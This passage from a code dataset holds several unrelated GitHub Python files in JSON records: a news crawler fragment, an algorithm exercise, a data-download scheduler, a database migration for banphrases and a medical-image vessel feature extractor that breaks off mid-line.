=proxy)\n if res.status_code == 200:\n print(res.headers['location'])\n return res.text\n return None\ndef parse_one_page():\n pass\ndef main():\n url = \"https://36kr.com/newsflashes\"\n html = crawel_one_page(url)\n print(html)\n # if html is not None:\n # for content in parse_one_page(html):\n\nmain()","repo_name":"myron123456/python_project","sub_path":"python爬虫/爬虫练习/crawel_36kr.py","file_name":"crawel_36kr.py","file_ext":"py","file_size_in_byte":2180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6397430824","text":"s = input()\n\ngroup0 = 0\ngroup1 = 0\n\nif s[0] == '0':\n group0 += 1\nelse:\n group1 += 1\n\nfor i in range(1, len(s)):\n # 숫자가 바뀌는 순간 집단의 개수로 하나 체크\n if s[i-1] != s[i]:\n if s[i] == '0':\n group0 += 1\n else:\n group1 += 1\n \n\n# 연속된 0의 집단과 연속된 1의 집단 중 더 작은 집단의 개수\nprint(min(group0, group1))","repo_name":"kminji127/Algorithm","sub_path":"01_Greedy/[BOJ] 1439_뒤집기.py","file_name":"[BOJ] 1439_뒤집기.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"36490756721","text":"from typing import List\nimport time\nimport json\nimport schedule\nimport sys\nimport os\nimport logging\n\n# logger initialization\nLOGGER = 
logging.getLogger(__name__)\nlogging.basicConfig(\n format=\"%(asctime)s %(name)-12s %(levelname)-8s %(message)s\", level=logging.INFO)\n\nsys.path.append(os.path.abspath('./download'))\n\nfrom APIClient import NaiadesClient\n\nclass DownloadScheduler():\n clients: List[\"NaiadesClient\"]\n\n def __init__(self, configuration_path: str = None) -> None:\n self.configuration(configurationPath=configuration_path)\n\n def configuration(self, configurationPath: str = None) -> None:\n # Read config file\n full_path = \"config/\" + configurationPath\n with open(full_path) as data_file:\n conf = json.load(data_file)\n\n conf_clients = conf[\"clients\"]\n self.clients = []\n\n for conf_client in conf_clients:\n path = \"config/\" + conf_client\n client = NaiadesClient(configurationPath=path)\n self.clients.append(client)\n\n # Schedule obtain calls (see schedule module documentation)\n for client in self.clients:\n #print(client.entity_id)\n if(client.seconds_between_samples is not None):\n #print(\"nope\")\n schedule.every(client.seconds_between_samples).seconds.do(client.obtain)\n elif(client.second_in_minute is not None):\n if(client.period is not None):\n schedule.every(client.period).minutes.at(client.second_in_minute).do(client.obtain)\n else:\n schedule.every().minute.at(client.second_in_minute).do(client.obtain)\n elif(client.minute_in_hour is not None):\n #print(\"minute\")\n if(client.period is not None):\n schedule.every(client.period).hours.at(client.minute_in_hour).do(client.obtain)\n else:\n schedule.every().hour.at(client.minute_in_hour).do(client.obtain)\n elif(client.hour_in_day is not None):\n #print(\"hour_in_day\")\n if(client.period is not None):\n schedule.every(client.period).days.at(client.hour_in_day).do(client.obtain)\n else:\n schedule.every().day.at(client.hour_in_day).do(client.obtain)\n else:\n LOGGER.info(\"Client {} cant be scheduled.\".format(client.entity_id))\n\n def run(self) -> None:\n # When started run all jobs (download data till now)\n schedule.run_all()\n\n while True:\n # run_pending obtain calls\n schedule.run_pending()\n time.sleep(1)\n","repo_name":"naiades-jsi/FIWARE-adapter","sub_path":"download/downloadScheduler.py","file_name":"downloadScheduler.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26645528884","text":"# headers.py\n\n\nclass Headers:\n \"\"\"\n Insert docstring here\n \"\"\"\n def __init__(self, title_header, timestamp_header, last_accessed_header,\n times_accessed_header, tags_header, metadata_header):\n \"\"\"\n Insert docstring here\n \"\"\"\n self.title_header = title_header\n self.timestamp_header = timestamp_header\n self.last_accessed_header = last_accessed_header\n self.times_accessed_header = times_accessed_header\n self.tags_header = tags_header\n self.metadata_header = metadata_header\n\n def get_prefixes(self):\n \"\"\"\n Returns list of the headers' prefixes\n \"\"\"\n prefixes = []\n prefixes.append(self.title_header.get_prefix())\n prefixes.append(self.timestamp_header.get_prefix())\n prefixes.append(self.last_accessed_header.get_prefix())\n prefixes.append(self.times_accessed_header.get_prefix())\n prefixes.append(self.tags_header.get_prefix())\n prefixes.append(self.metadata_header.get_prefix())\n return prefixes\n\n def read(self, input_string):\n \"\"\"\n Insert docstring here\n \"\"\"\n self.title_header.read(input_string.splitlines(False)[0])\n self.timestamp_header.read(input_string.splitlines(False)[1])\n 
self.last_accessed_header.read(input_string.splitlines(False)[2])\n self.times_accessed_header.read(input_string.splitlines(False)[3])\n self.tags_header.read(input_string.splitlines(False)[4])\n self.metadata_header.read(input_string.splitlines(False)[5])\n\n def write(self):\n \"\"\"\n Insert docstring here\n \"\"\"\n\n return self.title_header.write() + self.timestamp_header.write() + \\\n self.last_accessed_header.write() + \\\n self.times_accessed_header.write() + self.tags_header.write() \\\n + self.metadata_header.write()\n","repo_name":"stefodestructo/Notes-Converter","sub_path":"tnotes/headers/headers.py","file_name":"headers.py","file_ext":"py","file_size_in_byte":1908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9871563136","text":"print('Sequência de Fibonacci')\nn1 = 0\nn2 = 1\na1 = int(input('\\nDigite o número de valores que deseja ver na sequência\\n'))\nprint(f'{n1} -> {n2}',end=' -> ')\ncont = 3\nwhile cont <= a1:\n n3 = n1 + n2\n print(n3,end=' -> ')\n n1 = n2\n n2 = n3\n cont = cont +1\nprint('Fim')","repo_name":"vitorgabrielmoura/Exercises","sub_path":"Python 3/Curso_em_video/d63.py","file_name":"d63.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"30761500387","text":"from .._classdef import TypeMessage\n\n\nclass WsMsgGroupInfo(object):\n \"\"\"\n websocket消息组的相关信息\n \"\"\"\n\n __slots__ = [\n '_group_type',\n '_group_id',\n '_last_msg_id',\n ]\n\n def __init__(self, data_proto: TypeMessage) -> None:\n self._group_type = data_proto.groupType\n self._group_id = data_proto.groupId\n self._last_msg_id = data_proto.lastMsgId\n\n def __repr__(self) -> str:\n return str(\n {\n 'group_type': self._group_type,\n 'group_id': self._group_id,\n 'last_msg_id': self._last_msg_id,\n }\n )\n\n @property\n def group_type(self) -> int:\n \"\"\"\n 消息组类别\n \"\"\"\n\n return self._group_type\n\n @property\n def group_id(self) -> int:\n \"\"\"\n 消息组id\n \"\"\"\n\n return self._group_id\n\n @property\n def last_msg_id(self) -> int:\n \"\"\"\n 最后一条消息的id\n \"\"\"\n\n return self._last_msg_id\n","repo_name":"Starry-OvO/aiotieba","sub_path":"aiotieba/api/init_websocket/_classdef.py","file_name":"_classdef.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":249,"dataset":"github-code","pt":"16"} +{"seq_id":"8994136245","text":"#!/usr/bin/env python3\n#-*- encoding: UTF-8 -*-\n\ndef main():\n try:\n number = int(input(\"Informe um número inteiro: \"))\n except:\n print(\"Apenas valores numéricos devem ser informados!\")\n if(number < 0):\n print(\"No conjunto dos reais, o cálculo de raízes de índice par só é possível com números positivos.\")\n else:\n print(\"A raíz quadrada de %d é %d.\" %(number, int(number**(1/2))))\nif(__name__ == \"__main__\"):\n main()\n","repo_name":"luizfelipe1914/Listas-Python","sub_path":"Lista 02/Questao2.py","file_name":"Questao2.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"11166015158","text":"\"\"\"Move banphrases from filters to the new banphrase table\n\nRevision ID: 1e79c9c63\nRevises: 15712d19833\nCreate Date: 2015-12-24 23:26:41.098033\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '1e79c9c63'\ndown_revision = '15712d19833'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy 
as sa\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nSession = sessionmaker()\n\nBase = declarative_base()\n\nclass Filter(Base):\n __tablename__ = 'tb_filters'\n\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String(128))\n type = sa.Column(sa.String(64))\n action_json = sa.Column('action', sa.dialects.mysql.TEXT)\n extra_extra_args = sa.Column('extra_args', sa.dialects.mysql.TEXT)\n filter = sa.Column(sa.dialects.mysql.TEXT)\n source = sa.Column(sa.dialects.mysql.TEXT)\n enabled = sa.Column(sa.Boolean)\n num_uses = sa.Column(sa.Integer)\n\n\nclass BanphraseData(Base):\n __tablename__ = 'tb_banphrase_data'\n\n banphrase_id = sa.Column(sa.Integer,\n sa.ForeignKey('tb_banphrase.id'),\n primary_key=True,\n autoincrement=False)\n num_uses = sa.Column(sa.Integer, nullable=False, default=0)\n added_by = sa.Column(sa.Integer,\n nullable=True)\n\n def __init__(self, banphrase_id, **options):\n self.banphrase_id = banphrase_id\n self.num_uses = 0\n self.added_by = None\n\n\nclass Banphrase(Base):\n __tablename__ = 'tb_banphrase'\n\n id = sa.Column(sa.Integer, primary_key=True)\n name = sa.Column(sa.String(256), nullable=False, default='')\n phrase = sa.Column(sa.String(256), nullable=False)\n length = sa.Column(sa.Integer, nullable=False, default=300)\n permanent = sa.Column(sa.Boolean, nullable=False, default=False)\n warning = sa.Column(sa.Boolean, nullable=False, default=True)\n notify = sa.Column(sa.Boolean, nullable=False, default=True)\n case_sensitive = sa.Column(sa.Boolean, nullable=False, default=False)\n\n DEFAULT_TIMEOUT_LENGTH = 300\n DEFAULT_NOTIFY = True\n\n def __init__(self, **options):\n self.id = None\n self.name = 'No name'\n self.length = self.DEFAULT_TIMEOUT_LENGTH\n self.permanent = False\n self.warning = True\n self.notify = self.DEFAULT_NOTIFY\n self.case_sensitive = False\n\n\nimport json\n\ndef upgrade():\n bind = op.get_bind()\n session = Session(bind=bind)\n\n for filter in session.query(Filter).filter_by(type='banphrase'):\n action = json.loads(filter.action_json)\n extra_args = {}\n if filter.extra_extra_args:\n extra_args = json.loads(filter.extra_extra_args)\n banphrase = Banphrase()\n banphrase.phrase = filter.filter\n banphrase.length = extra_args['time'] if 'time' in extra_args else 300\n banphrase.permanent = True if 'cb' in action and action['cb'] == 'ban_source' else False\n banphrase.name = filter.name\n banphrase.enabled = filter.enabled\n session.add(banphrase)\n session.commit()\n banphrase.data = BanphraseData(banphrase.id)\n banphrase.data.num_uses = filter.num_uses\n session.add(banphrase.data)\n session.delete(filter)\n\n session.commit()\n\n\ndef downgrade():\n # you're screwed if you want to downgrade EleGiggle\n pass\n","repo_name":"leecopland/bullbot","sub_path":"alembic/versions/1e79c9c63_move_banphrases_from_filters_to_the_new_.py","file_name":"1e79c9c63_move_banphrases_from_filters_to_the_new_.py","file_ext":"py","file_size_in_byte":3343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"75207740807","text":"import os\nimport torch\nimport argparse\nimport cv2\nimport numpy as np\nimport SimpleITK as sitk\nimport pickle\nimport networkx as nx\n\nfrom tqdm import tqdm\n\nimport six\n\nfrom skimage.measure import regionprops\nfrom radiomics import featureextractor\nfrom glob import glob\nfrom tqdm import tqdm\nfrom artery.Artery import _load_graph, ARTERY_CATEGORY\nfrom train_artery_ngm_feat import 
collate_fn\n\n\nclass FeatureExtractor:\n\n def __init__(self):\n self.__init_config__()\n\n def __init_config__(self):\n extractor = featureextractor.RadiomicsFeatureExtractor()\n extractor.disableAllFeatures()\n extractor.enableFeatureClassByName('firstorder')\n extractor.enableFeatureClassByName('glcm')\n extractor.enableFeatureClassByName('gldm')\n extractor.enableFeatureClassByName('glrlm')\n extractor.enableFeatureClassByName('glszm')\n extractor.enableFeatureClassByName('ngtdm')\n\n print('Extraction parameters:\\n\\t', extractor.settings)\n print('Enabled filters:\\n\\t', extractor.enabledImagetypes)\n print('Enabled features:\\n\\t', extractor.enabledFeatures)\n self.extractor = extractor\n\n def extract_pos_feature(self, vessel_obj, binary_image, original_image):\n features = []\n feature_dict = {}\n # feature 1: number of vessel pixels\n feature_dict['n_pixels'] = np.sum(vessel_obj.vessel_mask == 1)\n features.append(np.sum(vessel_obj.vessel_mask == 1))\n # feature 2: length of centerlines\n feature_dict['n_centerline'] = np.sum(vessel_obj.vessel_centerline == 1)\n features.append(np.sum(vessel_obj.vessel_centerline == 1))\n # feature 5, 6: mean and stand deviation of the intensities within the centerline in grayscale image_x\n # vessel_centerline_roi = original_image * vessel_obj.vessel_centerline\n # features.append(np.mean(vessel_centerline_roi.flatten()[vessel_centerline_roi.flatten() > 0])) # mean\n # features.append(np.std(vessel_centerline_roi.flatten()[vessel_centerline_roi.flatten() > 0])) # std\n # feature 7-10: absolute position of vessel in whole binary image_x\n binary_properties = regionprops(binary_image, original_image)\n binary_center_of_mass = binary_properties[0].centroid\n binary_weighted_center_of_mass = binary_properties[0].weighted_centroid\n\n vessel_properties = regionprops(vessel_obj.vessel_mask, original_image)\n vessel_center_of_mass = vessel_properties[0].centroid\n vessel_weighted_center_of_mass = vessel_properties[0].weighted_centroid\n\n feature_dict[\"x_center\"] = vessel_center_of_mass[0] / binary_center_of_mass[0]\n feature_dict[\"y_center\"] = vessel_center_of_mass[1] / binary_center_of_mass[1]\n feature_dict[\"weighted_x_center\"] = vessel_weighted_center_of_mass[0] / binary_weighted_center_of_mass[0]\n feature_dict[\"weighted_y_center\"] = vessel_weighted_center_of_mass[1] / binary_weighted_center_of_mass[1]\n features.append(vessel_center_of_mass[0] / binary_center_of_mass[0])\n features.append(vessel_center_of_mass[1] / binary_center_of_mass[1])\n features.append(vessel_weighted_center_of_mass[0] / binary_weighted_center_of_mass[0])\n features.append(vessel_weighted_center_of_mass[1] / binary_weighted_center_of_mass[1])\n\n # feature 11-18: absolute position of start and end point to center of binary image_x\n if vessel_obj.node1.x < vessel_obj.node2.x:\n features.append(vessel_obj.node1.x / binary_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_center_of_mass[1])\n features.append(vessel_obj.node1.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_weighted_center_of_mass[1])\n features.append(vessel_obj.node2.x / binary_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_center_of_mass[1])\n features.append(vessel_obj.node2.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_weighted_center_of_mass[1])\n\n feature_dict[\"p1_x_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p1_y_center\"] = vessel_obj.node1.x / 
binary_center_of_mass[0]\n feature_dict[\"p1_x_weighted_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p1_y_weighted_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p2_x_center\"] = vessel_obj.node2.x / binary_center_of_mass[0]\n feature_dict[\"p2_y_center\"] = vessel_obj.node2.y / binary_center_of_mass[1]\n feature_dict[\"p2_x_weighted_center\"] = vessel_obj.node2.x / binary_weighted_center_of_mass[0]\n feature_dict[\"p2_y_weighted_center\"] = vessel_obj.node2.y / binary_weighted_center_of_mass[1]\n else:\n features.append(vessel_obj.node2.x / binary_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_center_of_mass[1])\n features.append(vessel_obj.node2.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / binary_weighted_center_of_mass[1])\n features.append(vessel_obj.node1.x / binary_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_center_of_mass[1])\n features.append(vessel_obj.node1.x / binary_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / binary_weighted_center_of_mass[1])\n\n feature_dict[\"p1_x_center\"] = vessel_obj.node2.x / binary_center_of_mass[0]\n feature_dict[\"p1_y_center\"] = vessel_obj.node2.y / binary_center_of_mass[1]\n feature_dict[\"p1_x_weighted_center\"] = vessel_obj.node2.x / binary_weighted_center_of_mass[0]\n feature_dict[\"p1_y_weighted_center\"] = vessel_obj.node2.y / binary_weighted_center_of_mass[1]\n feature_dict[\"p2_x_center\"] = vessel_obj.node1.x / binary_center_of_mass[0]\n feature_dict[\"p2_y_center\"] = vessel_obj.node1.y / binary_center_of_mass[1]\n feature_dict[\"p2_x_weighted_center\"] = vessel_obj.node1.x / binary_weighted_center_of_mass[0]\n feature_dict[\"p2_y_weighted_center\"] = vessel_obj.node1.y / binary_weighted_center_of_mass[1]\n\n # feature 19-26 : absolute position of start and end point to center of vessel segment image_x\n if vessel_obj.node1.x < vessel_obj.node2.x:\n features.append(vessel_obj.node1.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node1.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_weighted_center_of_mass[1])\n features.append(vessel_obj.node2.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node2.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_weighted_center_of_mass[1])\n\n feature_dict[\"p1_abs_x_center\"] = vessel_obj.node1.x / vessel_center_of_mass[0]\n feature_dict[\"p1_abs_y_center\"] = vessel_obj.node1.y / vessel_center_of_mass[1]\n feature_dict[\"p1_abs_x_weighted_center\"] = vessel_obj.node1.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p1_abs_y_weighted_center\"] = vessel_obj.node1.y / vessel_weighted_center_of_mass[1]\n feature_dict[\"p2_abs_x_center\"] = vessel_obj.node2.x / vessel_center_of_mass[0]\n feature_dict[\"p2_abs_y_center\"] = vessel_obj.node2.y / vessel_center_of_mass[1]\n feature_dict[\"p2_abs_x_weighted_center\"] = vessel_obj.node2.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p2_abs_y_weighted_center\"] = vessel_obj.node2.y / vessel_weighted_center_of_mass[1]\n else:\n features.append(vessel_obj.node2.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node2.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node2.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node2.y / 
vessel_weighted_center_of_mass[1])\n features.append(vessel_obj.node1.x / vessel_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_center_of_mass[1])\n features.append(vessel_obj.node1.x / vessel_weighted_center_of_mass[0])\n features.append(vessel_obj.node1.y / vessel_weighted_center_of_mass[1])\n\n feature_dict[\"p1_abs_x_center\"] = vessel_obj.node2.x / vessel_center_of_mass[0]\n feature_dict[\"p1_abs_y_center\"] = vessel_obj.node2.y / vessel_center_of_mass[1]\n feature_dict[\"p1_abs_x_weighted_center\"] = vessel_obj.node2.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p1_abs_y_weighted_center\"] = vessel_obj.node2.y / vessel_weighted_center_of_mass[1]\n feature_dict[\"p2_abs_x_center\"] = vessel_obj.node1.x / vessel_center_of_mass[0]\n feature_dict[\"p2_abs_y_center\"] = vessel_obj.node1.y / vessel_center_of_mass[1]\n feature_dict[\"p2_abs_x_weighted_center\"] = vessel_obj.node1.x / vessel_weighted_center_of_mass[0]\n feature_dict[\"p2_abs_y_weighted_center\"] = vessel_obj.node1.y / vessel_weighted_center_of_mass[1]\n\n # feature 27, 28: degree of two points\n if vessel_obj.node1.x < vessel_obj.node2.x:\n features.append(vessel_obj.node1.degree)\n features.append(vessel_obj.node2.degree)\n feature_dict[\"p1_degree\"] = vessel_obj.node1.degree\n feature_dict[\"p2_degree\"] = vessel_obj.node2.degree\n\n else:\n features.append(vessel_obj.node2.degree)\n features.append(vessel_obj.node1.degree)\n feature_dict[\"p1_degree\"] = vessel_obj.node2.degree\n feature_dict[\"p2_degree\"] = vessel_obj.node1.degree\n\n # feature 29, 30, 31, 32: mean, std, min, max of vascular radius\n radius = vessel_obj.vessel_centerline_dist\n radius = radius[radius > 0]\n features.append(np.mean(radius))\n features.append(np.std(radius))\n features.append(np.min(radius))\n features.append(np.max(radius))\n feature_dict[\"r_mean\"] = np.mean(radius)\n feature_dict[\"r_std\"] = np.std(radius)\n feature_dict[\"r_min\"] = np.min(radius)\n feature_dict[\"r_max\"] = np.max(radius)\n\n features.append(vessel_obj.vessel_class)\n return feature_dict\n\n def extract_radiomics_features(self, vessel_obj, original_image):\n # extract features from predicted numpy arrays\n data_x = sitk.GetImageFromArray(original_image)\n data_y = sitk.GetImageFromArray(vessel_obj.vessel_mask)\n\n # columns_drop = [\"diagnostics_Configuration_EnabledImageTypes\", \"diagnostics_Configuration_Settings\",\n # \"diagnostics_Image-original_Dimensionality\", \"diagnostics_Image-original_Hash\",\n # \"diagnostics_Image-original_Size\", \"diagnostics_Image-original_Spacing\",\n # \"diagnostics_Mask-original_BoundingBox\", \"diagnostics_Mask-original_CenterOfMass\",\n # \"diagnostics_Mask-original_CenterOfMassIndex\", \"diagnostics_Mask-original_Hash\",\n # \"diagnostics_Mask-original_Size\", \"diagnostics_Mask-original_Spacing\",\n # \"diagnostics_Versions_Numpy\", \"diagnostics_Versions_PyRadiomics\",\n # \"diagnostics_Versions_PyWavelet\", \"diagnostics_Versions_Python\",\n # \"diagnostics_Versions_SimpleITK\",\n # \"diagnostics_Image-original_Maximum\",\n # \"diagnostics_Image-original_Mean\",\n # \"diagnostics_Image-original_Minimum\"]\n\n feature = self.extractor.execute(data_x, data_y, label=1)\n keys = []\n feature_dict = {}\n for key, value in sorted(six.iteritems(feature)):\n if not key.startswith(\"diagnostics\"):\n #print('\\t', key, ':', value)\n if type(value) == np.ndarray:\n keys.append(key)\n feature_dict[key] = np.float(value)\n else:\n raise ValueError(\"CANNOT PARSE VALUE\")\n\n #print(\"# number of keys 
{}\".format(len(keys)))\n # write csv header\n return feature_dict\n\n def get_class(self, vessel_obj):\n return vessel_obj.vessel_class\n\n\ndef _get_sample_list():\n dataset0 = []\n dataset1 = []\n with open(\"selected_subjects.txt\", \"r\") as f:\n #with open(\"/media/z/data2/artery_semantic_segmentation/gmn_4_semantic_seg/selected_subjects.txt\", \"r\") as f:\n for row in f.readlines():\n if row[0].isdigit():\n dataset1.append(row.strip())\n elif row[0].isalpha() and (row.strip() not in [\"NJ\", \"TW\"]):\n dataset0.append(row.strip())\n\n return {\"NJ\": dataset1, \"TW\": dataset0}\n\n\ndef get_feature_names():\n from core.utils.module import VesselSegment, Node\n vessel_obj = VesselSegment(Node(1, 100, 100), Node(3, 120, 120), np.random.rand(128,128))\n vessel_obj.vessel_class = 1\n\n vessel_mask = np.random.rand(128,128)\n mean = np.mean(vessel_mask)\n vessel_mask[vessel_mask>mean] = 1\n vessel_mask[vessel_mask!=1] = 0\n #print(vessel_mask)\n vessel_mask = np.array(vessel_mask, dtype=np.int8)\n vessel_obj.vessel_mask = vessel_mask\n vessel_obj.vessel_centerline_dist = np.random.rand(128,128)\n\n binary_image = vessel_mask\n\n feature_dict = {}\n fa = FeatureExtractor()\n pos_features = fa.extract_pos_feature(vessel_obj, binary_image, np.random.rand(128,128))\n image_features = fa.extract_radiomics_features(vessel_obj, np.random.rand(128,128))\n \n feature_dict.update(image_features)\n feature_dict.update(pos_features)\n sorted_keys = sorted(feature_dict)\n\n return sorted_keys\n\n\ndef __switch__(g0, g1):\n n0, n1 = g0.number_of_nodes(), g1.number_of_nodes()\n\n if n0 >= n1:\n return g1, g0\n else:\n return g0, g1\n\ndef __build_graphs__(g):\n A = nx.adjacency_matrix(g).todense()\n edge_num = g.number_of_edges()*2 # in network graph, adjmatrix indicates undirected graph, thus, for directed graph, the number of edges are doubled\n node_num = g.number_of_nodes()\n G = np.zeros((node_num, edge_num), dtype=np.float32)\n H = np.zeros((node_num, edge_num), dtype=np.float32)\n edge_idx = 0\n for i in range(node_num): # iterative graph adjacency matrix\n for j in range(node_num):\n if A[i, j] == 1:\n G[i, edge_idx] = 1\n H[j, edge_idx] = 1\n edge_idx += 1\n return A, G, H, edge_num\n\n\ndef __build_2gm_pair(g0, g1, category, sample_idx):\n n0, n1 = g0.number_of_nodes(), g1.number_of_nodes()\n perm_mat = np.zeros((n0, n1))\n for i in range(n0):\n for j in range(n1):\n if g0.nodes()[i]['data'].vessel_class == g1.nodes()[j]['data'].vessel_class:\n perm_mat[i, j] = 1.0\n\n A0, G0, H0, e0 = __build_graphs__(g0)\n A1, G1, H1, e1 = __build_graphs__(g1)\n\n ret_dict = {'ns': [torch.tensor(x) for x in [n0, n1]],\n 'es': [torch.tensor(x) for x in [e0, e1]],\n 'gs': [g0, g1],\n 'gt_perm_mat': perm_mat,\n 'Gs': [torch.Tensor(x) for x in [G0, G1]],\n 'Hs': [torch.Tensor(x) for x in [H0, H1]],\n 'As': [torch.Tensor(x) for x in [A0, A1]],\n 'cls': category,\n 'id_list': [sample_idx[0], sample_idx[1]]}\n\n feat0 = np.stack([np.array(g0.nodes()[i]['data'].features) for i in range(n0)], axis=-1).T\n feat1 = np.stack([np.array(g1.nodes()[i]['data'].features) for i in range(n1)], axis=-1).T\n ret_dict['pos_features'] = [torch.Tensor(x) for x in [feat0, feat1]]\n\n return ret_dict\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--base_path', type=str, default='/media/z/data21/artery_semantic_segmentation')\n parser.add_argument('--data_path', type=str, default=\"gmn_vessel\")\n parser.add_argument('--save_path', type=str, default=\"artery/data2\")\n 
parser.add_argument('--project_path', type=str, default=\"ThinkMatch\")\n parser.add_argument('--image_size', type=int, default=512)\n args = parser.parse_args()\n\n if not os.path.isdir(args.save_path):\n os.makedirs(args.save_path)\n\n sample_list = _get_sample_list()\n\n FEATURE_DICT_ALL = {}\n fa = FeatureExtractor()\n\n extract = False\n if extract:\n for dataset_name, data_path in zip([\"TW\", \"NJ\"],\n [os.path.join(args.base_path, \"gmn_vessel/data/data_tw_semantic/processed\"),\n os.path.join(args.base_path, \"gmn_vessel/data/data_nj_semantic/processed\")]):\n selected_sample_names = sample_list[dataset_name]\n for selected_sample_name in tqdm(selected_sample_names):\n print(f\"[x] processing {selected_sample_name} ---- \")\n pkl_file_path = os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_g_switch_unique.pkl\")\n\n binary_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_binary_image.png\"), cv2.IMREAD_GRAYSCALE)\n if binary_image.shape[0] != args.image_size:\n binary_image = cv2.resize(binary_image, (args.image_size, args.image_size))\n\n original_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}.png\"), cv2.IMREAD_GRAYSCALE)\n if original_image.shape[0] != args.image_size:\n original_image = cv2.resize(original_image, (args.image_size, args.image_size))\n print(pkl_file_path)\n g = pickle.load(open(pkl_file_path, 'rb'))\n for n in range(len(g.nodes)):\n vessel_segment = g.nodes()[n]['data']\n feature_dict = {}\n pos_features = fa.extract_pos_feature(vessel_segment, binary_image, original_image)\n image_features = fa.extract_radiomics_features(vessel_segment, original_image)\n feature_dict.update(pos_features)\n feature_dict.update(image_features)\n sorted_keys = sorted(feature_dict)\n features = []\n for k in sorted_keys:\n if k in FEATURE_DICT_ALL.keys():\n FEATURE_DICT_ALL[k].append(feature_dict[k])\n else:\n FEATURE_DICT_ALL[k] = []\n FEATURE_DICT_ALL[k].append(feature_dict[k])\n\n features.append(feature_dict[k])\n\n vessel_segment.features = features\n # new\n # vessel_segment.vessel_centerline = None\n vessel_segment.vessel_mask = None\n vessel_segment.vessel_centerline_dist = None\n\n pickle.dump(g, open(os.path.join(args.base_path, args.project_path, args.save_path, f\"{selected_sample_name}.pkl\"), \"wb\"))\n cv2.imwrite(os.path.join(args.base_path, args.project_path, args.save_path,\n f\"{selected_sample_name}_binary_image.png\"), binary_image)\n cv2.imwrite(os.path.join(args.base_path, args.project_path, args.save_path,\n f\"{selected_sample_name}.png\"), original_image)\n\n semantic_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name,\n f\"{selected_sample_name}_step12_g_switch_unique_semantic_image.png\"))\n cv2.imwrite(os.path.join(args.base_path, args.project_path, args.save_path,\n f\"{selected_sample_name}_semantic.png\"), semantic_image)\n\n # normalize features\n sorted_keys = sorted(FEATURE_DICT_ALL)\n for k in sorted_keys:\n print(f\"k = {k}, min = {np.min(FEATURE_DICT_ALL[k])}, max = {np.max(FEATURE_DICT_ALL[k])}, len = {len(FEATURE_DICT_ALL[k])}\")\n\n for dataset_name, data_path in zip([\"TW\", \"NJ\"],\n [os.path.join(args.base_path, \"gmn_vessel/data/data_tw_semantic/processed\"),\n os.path.join(args.base_path, \"gmn_vessel/data/data_nj_semantic/processed\")]):\n selected_sample_names = sample_list[dataset_name]\n for selected_sample_name in tqdm(selected_sample_names):\n 
print(f\"[x] processing {selected_sample_name} ---- \")\n pkl_file_path = os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_g_switch_unique.pkl\")\n\n binary_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}_binary_image.png\"), cv2.IMREAD_GRAYSCALE)\n if binary_image.shape[0] != args.image_size:\n binary_image = cv2.resize(binary_image, (args.image_size, args.image_size))\n\n original_image = cv2.imread(os.path.join(args.base_path, data_path, selected_sample_name, f\"{selected_sample_name}.png\"), cv2.IMREAD_GRAYSCALE)\n if original_image.shape[0] != args.image_size:\n original_image = cv2.resize(original_image, (args.image_size, args.image_size))\n\n print(pkl_file_path)\n g = pickle.load(open(pkl_file_path, 'rb'))\n for n in range(len(g.nodes)):\n vessel_segment = g.nodes()[n]['data']\n feature_dict = {}\n pos_features = fa.extract_pos_feature(vessel_segment, binary_image, original_image)\n image_features = 